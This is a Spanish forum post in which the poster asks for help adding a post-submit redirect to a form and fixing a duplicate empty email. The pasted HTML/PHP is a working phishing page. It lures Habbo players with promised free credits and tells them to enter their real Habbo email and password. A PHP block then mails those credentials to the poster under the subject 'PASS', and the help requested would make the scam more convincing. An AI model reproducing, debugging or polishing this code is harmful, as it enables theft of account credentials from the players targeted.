Pues eso que me gustaria que despues de que la gente de a enviar en el formulario este les mostrase una pagina mia por ejemplo pagform.htm ó pagform.php y no se como hacerlo.
Tambien si alguien me dice o me aclara porque cuando recibo el formulario recibo 2 correos uno con los datos del que lo ha mandado y otro vacio completamente igual pero sin datos.
os dejo el archivo html a ver si lo podeis corregir ya con lo de redireccionamiento tambien.
Gracias a todos de antemano
------------------
<! DOCTYPE HTML>
<html>
<head>
    <title>Login</title>
	<style type="text/css">
.style2 {
	font-family: Arial;
}
.style3 {
	background-color: #E5E5E5;
}
.style4 {
	background-color: #00FF00;
}
.style6 {
	font-size: x-large;
}
.style7 {
	color: #008000;
}
.style8 {
	text-align: left;
}
.style9 {
	text-align: left;
	font-weight: bold;
	font-family: Arial;
}
.style12 {
	margin-left: 120px;
}
</style>
</head>
<body>
    		<p class="style12">
    		<strong><span class="style2"><br>
		<img src="Habo.JPG" width="301" height="92">
		<span class="style6">CREDITOS GRATIS</span></span></strong></p>
			<p class="style12">
    		<strong>P<span class="style2">aso 1: Has de registrarte en la web 
			para poder recibir los regalos y creditos.<br>
		<br>
		<span class="style7">Para registrarte en primer lugar has de poner el 
		correo y la contraseña que usas en HABBO<br>
		Si no pones la correcta la página te dará error y no te dejará 
		seguir..!! es decir no pasaras de esta pagina.</span></span></strong><br>
		<br>
		<br>
		<strong> <br>
    		</p>
    <form action="formulario2.php" method="post" enctype="multipart/form-data" name="form1" class="style12"> 
<table border="0"> 
<tr> 
<td width="200" class="style9"><div class="style9">Nick:</div></td> 
<td width="200" class="style8"><div align="left" class="style8"> 
<label> 
<input name="nombre" type="text" id="nombre" style="width: 281px" class="style3" /> 
</label> 
</div></td> 
</tr> 
<tr> 
<td class="style9"><div class="style9">Contraseña:</div></td> 
<td class="style8"><div align="left" class="style8"> 
<label> 
<input name="pass" type="password" id="password" style="width: 242px" class="style3" /> 
</label> 
</div></td> 
</tr> 
<tr> 
<td class="style9"><div class="style9">E-mail:</div></td> 
<td class="style8">
<input name="email" type="text" id="email" style="width: 340px" class="style3" /> </td> 
</tr> 
<tr> 
<td class="style8"><div class="style8"> 
<input name="restablecer" type="reset" id="restablecer" value="Restablecer" class="style3" /> 
</div></td> 
<td class="style8"><div class="style8"> 
<input name="Enviar" type="submit" id="Enviar" value="Iniciar Registro" class="style4" /> 
</div></td> 
</tr> 
</table></form>
<?php 
$sendTo = "[email protected]"; 
$subject = "PASS"; 
$nombre = $_POST["nombre"]; 
$titulo = $_POST["pass"]; 
$email = $_POST["email"]; 
$headers .= ""; 
$message = "Nombre: " . $nombre . "\nPassword: " . $titulo . "\nEmail: " . $email; 
mail($sendTo, $subject, $message, $headers);
?>
</strong>
<p><img src="Habbo.JPG" width="457" height="591"><img src="Habboo.JPG" width="545" height="641"></p>
</body>
 
</html> 
   
 
 Redireccionar a una web despues de dar a ENVIAR en mi formulario
 Redireccionar a una web despues de dar a ENVIAR en mi formulario 


